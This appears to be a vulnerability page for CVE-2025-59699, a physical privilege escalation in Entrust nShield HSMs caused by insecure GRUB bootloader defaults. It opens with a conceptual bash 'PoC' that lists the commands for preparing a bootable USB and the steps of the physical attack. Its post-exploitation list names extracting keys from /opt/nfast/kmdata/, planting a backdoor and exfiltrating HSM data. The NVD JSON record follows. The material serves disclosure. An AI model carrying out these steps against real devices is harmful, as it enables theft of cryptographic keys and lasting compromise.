CVE-2025-59699

#!/bin/bash # CVE-2025-59699 PoC - Entrust nShield HSM Physical Privilege Escalation # This PoC demonstrates the attack concept (for authorized testing only) echo "=== CVE-2025-59699 PoC ===" echo "Target: Entrust nShield Connect XC, nShield 5c, nShield HSMi" echo "Vulnerability: Insecure Legacy GRUB Bootloader default settings" # Step 1: Prepare USB drive with valid root filesystem cat << 'EOF' # Create bootable USB with valid root filesystem for nShield HSM # Required: USB drive, Linux live environment, nShield firmware rootfs # 1. Format USB drive with ext4 filesystem sudo fdisk /dev/sdX # Select USB device sudo mkfs.ext4 /dev/sdX1 # 2. Mount and extract nShield root filesystem sudo mount /dev/sdX1 /mnt/usb sudo tar -xzf nshield-rootfs.tar.gz -C /mnt/usb # 3. Configure GRUB for USB boot sudo grub-install --boot-directory=/mnt/usb/boot /dev/sdX EOF # Step 2: Attack execution steps echo "" echo "Attack Execution:" cat << 'EOF' # Physical attack steps: # 1. Attacker gains physical access to nShield HSM device # 2. Insert prepared USB drive into device USB port # 3. Power on or reboot the device # 4. Access GRUB bootloader menu (interrupt boot process) # 5. Select USB device as boot source # 6. System boots from USB with attacker-controlled filesystem # 7. Gain root shell access with full system control # Post-exploitation: # - Extract encryption keys from /opt/nfast/kmdata/ # - Modify system configuration # - Install backdoor for persistent access # - Exfiltrate sensitive HSM data EOF echo "" echo "=== End of PoC ===" echo "Note: This is a conceptual PoC for authorized security testing only"

{"cve": {"id": "CVE-2025-59699", "sourceIdentifier": "[email protected]", "published": "2025-12-02T15:15:55.537", "lastModified": "2025-12-08T19:41:55.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to escalate privileges by booting from a USB device with a valid root filesystem. This occurs because of insecure default settings in the Legacy GRUB Bootloader."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_5c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "CFB3D135-8EAC-4053-BB94-18D5BBB24AE7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_5c_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "ED259AB7-BFED-4B97-B455-E1D34730CFFF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_5c:-:*:*:*:*:*:*:*", "matchCriteriaId": "2BB0F3F8-F5DE-41CB-B804-BBFB78C6ADEB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_hsmi_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "ED3AEBBD-7F75-47F1-8EEA-342BAC9D265E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_hsmi_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "D7125CC3-3B27-4C90-97DE-51D226FBDC00"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_hsmi:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7665EE9-9F7F-456F-B172-ED188DD3BAD4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_base_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "F73858FD-5FE6-4AFA-84F2-E19743E9D900"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_base_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "01CDF5EE-9059-478A-BFE5-D7ADEF9625C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_base:-:*:*:*:*:*:*:*", "matchCriteriaId": "18FCA0E9-EEA9-40EC-9E0F-942F049D2354"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_mid_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "5A54F973-25D8-468D-B6A4-240A95D94A0B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_mid_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "0E43D1A7-9CB7-479D-89A9-D5041BB212A4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_mid:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB0ACAD9-BBCE-43CC-BD84-2023885725EE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_high_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "CBC11D8B-D72E-4CE9-AE61-AEA85F122F22"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_high_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "1D7048C8-EB43-4F23-8946-456EF6F3A1B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_high:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F0EDB1F-932B-4EC5-9D09-03CAD98BC2FA"}]}]}], "references": [{"url": "https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.entrust.com/use-case/why-use-an-hsm", "source": "[email protected]", "tags": ["Product"]}]}}